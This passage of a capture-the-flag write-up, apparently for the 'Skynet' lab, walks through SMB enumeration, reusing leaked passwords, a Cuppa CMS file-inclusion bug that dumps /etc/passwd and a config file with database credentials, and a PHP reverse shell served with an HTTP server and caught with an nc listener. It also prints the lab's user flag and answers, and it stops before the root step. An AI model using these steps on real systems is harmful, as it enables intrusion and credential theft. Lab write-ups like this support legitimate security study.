I then realized I will have to go with this route first. Looking back at the nmap scan, we see that port 445 seems to be for Samba. Using enum4linux, I saw the following shares:
There seems to be read access to they anonymous disk. Using smbclient I was able to see a couple files:
There was also a directory called logs:
I downloaded all of those files to my local machine using "mget *". I viewed all of the downloaded files.
The log files seemed to contain passwords. I went back to the mail site and entered the username milesdyson and password cyborg007haloterminator and I got in:
What is Miles password for his emails? cyborg007haloterminator
There does seem to be another user here serenakogan. I kept that in my notes just for future reference. The email from skynet@skynet seemed to have some interesting information in it:
Using that password, I was able to log into miles' samba share:
In the notes directory, I found a file called important.txt. In it it contained the following information:
<script> function CloseDefaultAlert(){SetAlert(false,"","#alert");setTimeout(function () {SetBlockade(false)},200); } function ShowAlert(){ _width =''; _height =''; jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
function CompleteAnimation(){jQuery("#btnClose_alert").css('visibility',"visible");jQuery("#description_alert").css('visibility',"visible");jQuery("#content_alert").css('visibility',"visible"); } }</script><div class="alert_config_field" id="alert" style="z-index:;"><div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div><div class="description_alert" id="description_alert"><b>Field configuration: </b></div><div class="separator" style="margin-bottom:15px;"></div><div id="content_alert" class="content_alert"> root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/falsesystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/falsesystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/falsesystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/falsesyslog:x:104:108::/home/syslog:/bin/false_apt:x:105:65534::/nonexistent:/bin/falselxd:x:106:65534::/var/lib/lxd/:/bin/falsemessagebus:x:107:111::/var/run/dbus:/bin/falseuuidd:x:108:112::/run/uuidd:/bin/falsednsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/falsesshd:x:110:65534::/var/run/sshd:/usr/sbin/nologinmilesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bashdovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/falsedovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/falsepostfix:x:113:121::/var/spool/postfix:/bin/falsemysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false</div></div>
...but not something too helpful. I tried this for /etc/shadow as well, but it did not seem to work. I then viewed the exploit once more and tried running the following:
If you decode the whole string using Base64, you get the following:
<?php class Configuration{ public $host ="localhost"; public $db ="cuppa"; public $user ="root"; public $password ="password123"; public $table_prefix ="cu_"; public $administrator_template ="default"; public $list_limit =25; public $token ="OBqIPqlFWf3X"; public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path ="media/uploadsFiles"; public $maximum_file_size ="5242880"; public $secure_login =0; public $secure_login_value =""; public $secure_login_redirect =""; } ?>
Here, we can see the username and password. I looked back at the nmap scan and realized that port 22 (SSH) is open. Maybe this is a password for that. It was not. After I was stuck for a while, I viewed the writeup here, and realized that I have to access the file using the URL. For that, I found the php-reverse-shell file, and then edited the IP address and port number. I then ran two commands on two different terminals:
python -m SimpleHTTPServer 80 //To serve the file to the Cuppa CMSnc -lvnp 1234 //To get the reverse connection
What is the user flag? 7ce5c2109a40f958099283600a9ae807
I then had the user file. I then had to get the root file. I referenced the same write-up mentioned above to see what they did for this. The author ends up using https://gtfobins.github.io/gtfobins/tar/#shell in order to get a root shell. I was again lost, and ended up finding the write-up at this page, and they ran the following commands: